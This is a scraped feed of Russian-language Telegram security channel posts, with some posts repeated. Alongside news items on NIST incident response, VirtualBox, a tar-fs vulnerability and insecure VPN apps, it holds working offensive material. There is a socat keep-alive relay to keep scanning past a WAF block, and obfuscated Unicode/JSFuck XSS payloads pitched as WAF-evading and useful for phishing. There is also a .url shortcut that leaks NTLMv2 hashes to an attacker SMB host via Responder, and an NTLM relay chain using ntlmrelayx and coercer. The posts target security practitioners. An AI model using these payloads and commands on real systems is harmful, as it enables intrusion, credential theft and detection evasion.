Forwarded from s0i37_channel
Заметил как то забавную вещь. В ходе пентеста получаю уведомление от скрипта из предыдущего поста, что таргет заблокировал меня, проверяю - действительно порт стал закрыт, но dirsearch на этот таргет при этом продолжает работать. Как такое может быть?
Причина это Keep-alive, что использует соединение многократно. И как становится понятным фаерволы и waf могут ненадежно защищать цель, блокируя новые подключения, но забывая про уже установленные коннекты (скрин).
И вот как можно попробовать сделать bypass таких waf:
Что бы многократно использовать одно и то же tcp-соединение и разделять его между разными утилитами (dirsearch, gobuster, etc) мы можем создать до блокировки висящее подключение.
Конечно же такой коннект рано или поздно может закрыть и удаленная сторона, но сам факт того, что мы взаимодействуем с target после активации waf весьма интересен.
Причина это Keep-alive, что использует соединение многократно. И как становится понятным фаерволы и waf могут ненадежно защищать цель, блокируя новые подключения, но забывая про уже установленные коннекты (скрин).
И вот как можно попробовать сделать bypass таких waf:
socat -v tcp-listen:1234,fork,reuseaddr - < /tmp/fifo | socat -v - tcp-connect:1.2.3.4:80,keepalive,keepidle=10,keepintvl=10,keepcnt=100 > /tmp/fifo
socat -v tcp-listen:1234,fork,reuseaddr - < /tmp/fifo | socat -v - openssl:1.2.3.4:443,verify=0 > /tmp/fifo
dirsearch -u http://127.0.0.1:1234
Что бы многократно использовать одно и то же tcp-соединение и разделять его между разными утилитами (dirsearch, gobuster, etc) мы можем создать до блокировки висящее подключение.
Конечно же такой коннект рано или поздно может закрыть и удаленная сторона, но сам факт того, что мы взаимодействуем с target после активации waf весьма интересен.
👍1
www.opennet.ru
Релиз системы виртуализации VirtualBox 7.2
Компания Oracle опубликовала релиз системы виртуализации VirtualBox 7.2. Готовые установочные пакеты доступны для RHEL 8/9/10, Fedora 36-42, openSUSE 15.6, Ubuntu 22.04/24.04/24.10, Debian 11/12, macOS и Windows.
🔗Ссылка:
https://opennet.ru/63727/
https://opennet.ru/63727/
Forwarded from Pentest Notes
Интересные XSS пейлоады подъехали 😊
Как это вообще работает:
Идентификаторы в JavaScript могут содержать любые символы Unicode, поэтому можно использовать переменные с именами на арабском, русском, иероглифах, греческом и т.д. — это не меняет работу кода.
Сам код при этом собирается из базовых примитивов (булевых значений, пустых строк, объектов), а нужные строки и функции извлекаются посимвольно по индексам из этих примитивов. (Принцип JSFuck).
И так далее — по индексации из известных значений.
Полный перечень тут
Таким образом можно сделать payload, который выполнится в браузере, но при этом, вероятно, не будет детектиться многими WAF (Или при фишинге). Дипсику кстати понравилось, он всё скушал
Ps.для того чтобы пейлоад отработал, его нужно поместить в js контекст. Например, в тег <script>
💫 @pentestnotes
ا='',ب=!ا+ا,ت=!ب+ا,ث=ا+{},ج=ب[ا++],ح=ب[خ=ا],
د=++خ+ا,ذ=ث[خ+د],ب[ذ+=ث[ا]+(ب.ت+ث)[ا]+ت[د]+ج+ح+ب[خ]+ذ+ج+ث[ا]+ح][ذ](ت[ا]+ت[خ]+ب[د]+ح+ج+"(1)")()甲='',乙=!甲+甲,丙=!乙+甲,丁=甲+{},戊=乙[甲++],己=乙[庚=甲],
辛=++庚+甲,壬=丁[庚+辛],
乙[壬+=丁[甲]+(乙.丙+丁)[甲]+丙[辛]+戊+己+乙[庚]+壬+戊+丁[甲]+己][壬](
丙[甲]+丙[庚]+乙[辛]+己+戊+"('被攻擊了')"
)()Как это вообще работает:
Идентификаторы в JavaScript могут содержать любые символы Unicode, поэтому можно использовать переменные с именами на арабском, русском, иероглифах, греческом и т.д. — это не меняет работу кода.
Сам код при этом собирается из базовых примитивов (булевых значений, пустых строк, объектов), а нужные строки и функции извлекаются посимвольно по индексам из этих примитивов. (Принцип JSFuck).
![] → false
!![] → true
+[] → 0
[]+[] → "" (пустая строка)
{}+[] и прочее дают строки вроде "[object Object]"
("false"+{})[1] → "a"
И так далее — по индексации из известных значений.
Полный перечень тут
Таким образом можно сделать payload, который выполнится в браузере, но при этом, вероятно, не будет детектиться многими WAF (Или при фишинге). Дипсику кстати понравилось, он всё скушал
Ps.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedBlue Notes
Каждый кто увидит - окаменеет отдаст свой пароль
Доброе утро! Сегодня расскажу о одном простом способе воровства NTLMv2 хэшей
1. Подготовка. Создаём интернет ярлык (.url), кстати, на такой файл НЕ будут жаловаться антивирусы🙈
2. Запускаем responder, что бы принимать хэши
3. Подкидываем жертве файл и рыбачим🎣 Ждём, когда кто-то откроет папку с нашим файлом
4. БИНГО! Хэш у нас💃 Дальше можно брутить, но это уже другая история
Хинт для красных👽 :
Хинт для синих👽 :
Подписывайтесь на канал, дальше больше!
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
Доброе утро! Сегодня расскажу о одном простом способе воровства NTLMv2 хэшей
1. Подготовка. Создаём интернет ярлык (.url), кстати, на такой файл НЕ будут жаловаться антивирусы
[InternetShortcut]
URL=RedBlue
WorkingDirectory=notes
IconFile=\\172.16.71.71\%USERNAME%.icon
IconIndex=1
2. Запускаем responder, что бы принимать хэши
sudo responder -I eth0
3. Подкидываем жертве файл и рыбачим
4. БИНГО! Хэш у нас
Хинт для красных
Можете прятать такие файлы на общедоступных шарах, ловить хэши и горизонтально перемещаться
Хинт для синих
Периодически проводите аудиты того, что лежит в шарах, а то вдруг кто-то положит .url или, может кто-то хранит password.txt🤣
Подписывайтесь на канал, дальше больше!
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Detection is easy
Всем привет! 💻 ✌️
Обратили внимание, что жизненный цикл реагирования на инциденты от NIST обновился в NIST.SP.800-61r3? Новая версия руководства интегрирована с Cybersecurity Framework (CSF) 2.0
На рисунке показана высокоуровневая модель жизненного цикла реагирования на инциденты, основанная на шести функциях:
- Управление (Govern): Стратегия, ожидания и политика организации в области управления рисками кибербезопасности устанавливаются, доводятся до сведения и отслеживаются
- Идентификация (Identify): анализируются текущие риски
- Защита (Protect): используются меры защиты для управления рисками
- Обнаружение (Detection): выявляются и анализируются возможные инциденты
- Реагирование (Respond): принимаются меры по реагированию в отношении обнаруженного инцидента
- Восстановление (Recover): восстанавливаются активы и процессы, затронутые инцидентом
Все шесть функций взаимосвязаны и формируют непрерывный процесс, где подготовка (управление, идентификация, защита) служит фундаментом для комплексной системы защиты.
Подготовка (управление, идентификация, защита) теперь выделена в отдельный этап, который не входит в процесс реагирования, но является основой для предотвращения инцидентов и снижения их последствий.
Реагирование (обнаружение, реагирование, восстановление) организовано как отдельный цикл, что связано с развитием MSSP (Managed Security Service Providers) и MDR (Managed Detection and Response). Эти сервисы позволяют организациям передать на аутсорс мониторинг и реагирование на инциденты, что особенно важно для малого и среднего бизнеса.
#dfir@detectioneasy
Обратили внимание, что жизненный цикл реагирования на инциденты от NIST обновился в NIST.SP.800-61r3? Новая версия руководства интегрирована с Cybersecurity Framework (CSF) 2.0
На рисунке показана высокоуровневая модель жизненного цикла реагирования на инциденты, основанная на шести функциях:
- Управление (Govern): Стратегия, ожидания и политика организации в области управления рисками кибербезопасности устанавливаются, доводятся до сведения и отслеживаются
- Идентификация (Identify): анализируются текущие риски
- Защита (Protect): используются меры защиты для управления рисками
- Обнаружение (Detection): выявляются и анализируются возможные инциденты
- Реагирование (Respond): принимаются меры по реагированию в отношении обнаруженного инцидента
- Восстановление (Recover): восстанавливаются активы и процессы, затронутые инцидентом
Все шесть функций взаимосвязаны и формируют непрерывный процесс, где подготовка (управление, идентификация, защита) служит фундаментом для комплексной системы защиты.
Подготовка (управление, идентификация, защита) теперь выделена в отдельный этап, который не входит в процесс реагирования, но является основой для предотвращения инцидентов и снижения их последствий.
Реагирование (обнаружение, реагирование, восстановление) организовано как отдельный цикл, что связано с развитием MSSP (Managed Security Service Providers) и MDR (Managed Detection and Response). Эти сервисы позволяют организациям передать на аутсорс мониторинг и реагирование на инциденты, что особенно важно для малого и среднего бизнеса.
#dfir@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Уязвимости в tar-fs и 7-Zip, позволяющие записать файлы за пределы базового каталога
В NPM-пакете tar-fs выявлена уязвимость (CVE-2025-48387), позволяющая при распаковке специально оформленного tar-архива записать файлы в любые части ФС, не ограниченные каталогом, в который осуществляется распаковка (насколько позволяют права доступа текущего…
🔗Ссылка:
https://opennet.ru/63740/
https://opennet.ru/63740/
Forwarded from Похек
Мой коллега-внутрянщик написал очень полезный инструмент PortRevert
#AD #pentest #Microsoft #NTLM #relay
PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).
➡️ Возможности
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур
➡️ Использование
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
2. Запустите ntlmrelayx на порту 4445:
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
➡️ Как это работает
💻 Github repo
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
#AD #pentest #Microsoft #NTLM #relay
PortRevert — этот инструмент перехватывает SMB трафик на порт 445 и перенаправляет его на порт 4445, позволяя использовать ntlmrelayx без остановки службы LanmanServer (которая слушает порт 445).
- Перехват всего TCP трафика на порт 445
- Перенаправление на порт 4445 для ntlmrelayx
- Автоматическая обработка двунаправленного трафика (запросы/ответы)
- Корректная очистка драйвера при завершении
- Поддержка как x86, так и x64 архитектур
Пример использования для NTLM relay
1. Запустите PortRevert от имени администратора:
PortRevert.exe
2. Запустите ntlmrelayx на порту 4445:
ntlmrelayx.exe -smb-port 4445 -smb2support -debug
3. Принудите жертву к аутентификации любым способом, например с помощью coercer:
coercer coerce -d cs.org -t dc1 -u test -p 'Password123!' -l pc3 --always-continue
(PortRevert должен быть запущен на хосте-слушателе, в данном случае - pc3)
Жертва -> Порт 445
↓ (перехват PortRedirector)
Жертва -> Порт 4445 -> ntlmrelayx
↓ (ответы)
ntlmrelayx -> Порт 4445
↓ (перенаправление обратно)
ntlmrelayx -> Порт 445 -> Жертва
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecAtor
Ресерчеры Citizen Lab выкатили результаты своих исследований безопасности ряда популярных VPN-приложений, доступных в магазине Google Play.
Оказалось, что многие из VPN-приложений реализуются с одним и тем же паролем Shadowsocks, жёстко зашитым в исходный код, который позволяет владельцам таких приложений расшифровывать пользовательский трафик.
Причем, по данным CitizenLab, эти приложения зарегистрированы на три подставные компании, управление которыми осуществляется с территории Китая.
Другие весьма интригующие детали представлены в отчете (PDF) и, вероятно, приоткроют для многих завесу в вопросах «безопасности и конфиденциальности» при использовании подобных сервисов.
Оказалось, что многие из VPN-приложений реализуются с одним и тем же паролем Shadowsocks, жёстко зашитым в исходный код, который позволяет владельцам таких приложений расшифровывать пользовательский трафик.
Причем, по данным CitizenLab, эти приложения зарегистрированы на три подставные компании, управление которыми осуществляется с территории Китая.
Другие весьма интригующие детали представлены в отчете (PDF) и, вероятно, приоткроют для многих завесу в вопросах «безопасности и конфиденциальности» при использовании подобных сервисов.